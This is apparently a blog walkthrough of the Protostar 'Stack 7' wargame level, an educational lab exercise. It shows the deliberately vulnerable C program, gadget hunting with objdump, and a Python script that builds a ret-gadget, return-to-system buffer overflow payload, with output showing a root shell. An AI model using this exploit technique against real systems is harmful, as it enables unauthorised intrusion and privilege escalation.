Tuesday, December 18, 2012

exploit-exercises Protostar: Stack 7

In this article, we tackle on Stack 7, the latest Stack challenge of Exploit-Exercises' Protostar wargame. The source code of the vulnerable program is provided as follow:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

char *getpath()
{
    char buffer[64];
    unsigned int ret;
    printf("input path please: "); fflush(stdout);
    gets(buffer);
    ret = __builtin_return_address(0);
    if((ret & 0xb0000000) == 0xb0000000)
    {
        printf("bzzzt (%p)\n", ret);
        _exit(1);
    }
    printf("got path %s\n", buffer);
    return strdup(buffer);
}

int main(int argc, char **argv)
{
    getpath();
}
Like the previous challenge, we have a restriction on the return address. But unlike last time, the restriction is ((ret & 0xb0000000) == 0xb0000000) which will prevent us from redirecting our attack to a library function like system(). The key point here is that the restriction is applied on the first returning address only! which means that we can do a ROP-Like exploit, with only one gadget: ret, and chain afterwards with our normal shellcode.
user@protostar:~/stack7$ objdump -d /opt/protostar/bin/stack7 | grep ret
 8048383:       c3                      ret
 8048494:       c3                      ret
 80484c2:       c3                      ret
 8048544:       c3                      ret
 8048553:       c3                      ret
 8048564:       c3                      ret
 80485c9:       c3                      ret
 80485cd:       c3                      ret
 80485f9:       c3                      ret
 8048617:       c3                      ret
We will be using one of those little tiny toys, the ret at 0x8048617 and adapt the exploit from the previous challenge.
user@protostar:~/stack7$ cat shell7.py
#!/usr/bin/env python

offset = 0x50
cmd = "/bin/sh;#"
junk = "J" * (offset - len(cmd))
gadg_ret = "\x17\x86\x04\x08"
ret1= "\xb0\xff\xec\xb7"
ret2 = "\xc0\x60\xec\xb7"
arg1 = "\x6c\xf7\xff\xbf"
arg2 = "\xf0\xf1\xff\xff"

payload = cmd + junk + gadg_ret + ret1 + ret2 + arg1 + arg2

print payload
user@protostar:~/stack7$ (cat payload1; cat) | /opt/protostar/bin/stack7
input path please: got path /bin/sh;#JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ �JJJJJJJJJJJJ ������`��l�������
id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)
whoami
root
exit
And that is it! Ofcourse there are many other variations, one of which would be
returning to our own shellcode like in Stack5 instead of returning to system()
library call.

No comments:

Post a Comment